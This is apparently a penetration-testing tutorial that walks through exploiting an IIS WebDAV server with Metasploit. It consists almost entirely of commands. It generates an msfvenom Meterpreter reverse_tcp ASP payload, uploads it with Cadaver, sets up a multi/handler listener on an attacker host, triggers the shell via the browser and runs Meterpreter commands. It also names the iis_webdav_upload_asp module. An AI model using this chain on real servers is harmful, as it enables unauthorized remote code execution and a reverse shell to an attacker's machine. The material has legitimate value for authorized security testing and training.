Exploiting WebDAV With Metasploit

Exploiting WebDAV with Metasploit involves leveraging vulnerabilities in the Web-based Distributed Authoring and Versioning (WebDAV) protocol to gain unauthorized access or control over web servers. Metasploit, a powerful penetration testing framework, offers modules to identify and exploit these weaknesses, enabling cybersecurity professionals to assess and enhance the security posture of their web applications.

1. Generate the Payload

Objective: Create a reverse TCP payload to gain a Meterpreter shell on the target machine.

Command:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<local-ip> LPORT=1234 -f asp > shell.asp

Explanation:

• -p windows/meterpreter/reverse_tcp: Specifies the payload type (Windows Meterpreter reverse TCP).

• LHOST=<local-ip>: Specifies the local IP address for the reverse connection.

• LPORT=1234: Specifies the local port for the reverse connection.

• -f asp: Specifies the format of the payload (ASP script for IIS server).

• > shell.asp: Saves the payload as shell.asp.

2. Upload the Payload to the WebDAV Server

Objective: Use Cadaver to upload the generated ASP payload to the WebDAV directory.

Command:

cadaver http://<target>/webdav

Procedure:

1. Run the command to start Cadaver.

2. Enter the username and password when prompted.

3. At the dav:/webdav/> prompt, use the following command to upload the payload:

   Copy

   shCopy codeput shell.asp

3. Set Up the Listener in Metasploit

Objective: Configure and run the Metasploit listener to catch the reverse shell connection.

Commands:

msfconsole

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set LHOST <local-ip>

set LPORT 1234

run

Explanation:

• msfconsole: Starts the Metasploit console.

• use exploit/multi/handler: Uses the generic exploit handler.

• set payload windows/meterpreter/reverse_tcp: Sets the payload type.

• set LHOST <local-ip>: Sets the local IP for the reverse connection.

• set LPORT 1234: Sets the local port for the reverse connection.

• run: Starts the listener to wait for the reverse connection.

Module: exploit/windows/iis/iis_webdav_upload_asp

This Metasploit module exploits a vulnerability in the IIS WebDAV service that allows unauthorized remote code execution. The vulnerability lies in the way IIS handles WebDAV requests, enabling an attacker to upload and execute arbitrary ASP scripts.

4. Trigger the Payload

Objective: Access the uploaded ASP payload through the browser to trigger the reverse shell.

Steps:

1. Open a web browser.

2. Navigate to the uploaded payload:

   Copy

   http://<target>/webdav/shell.asp

5. Gain Meterpreter Shell

Objective: Gain control over the target machine via the Meterpreter shell.

Procedure:

• Once the payload is executed, you should see a Meterpreter session open in Metasploit.

Commands to interact with Meterpreter:

sysinfo          # Display system information
getuid           # Get user ID
shell            # Drop into a command shell

Hacker's Mantra:New security loopholes are constantly popping up because of wireless networking. The cat-and-mouse game between hackers and system administrators is still in full swing. - Kevin Mitnick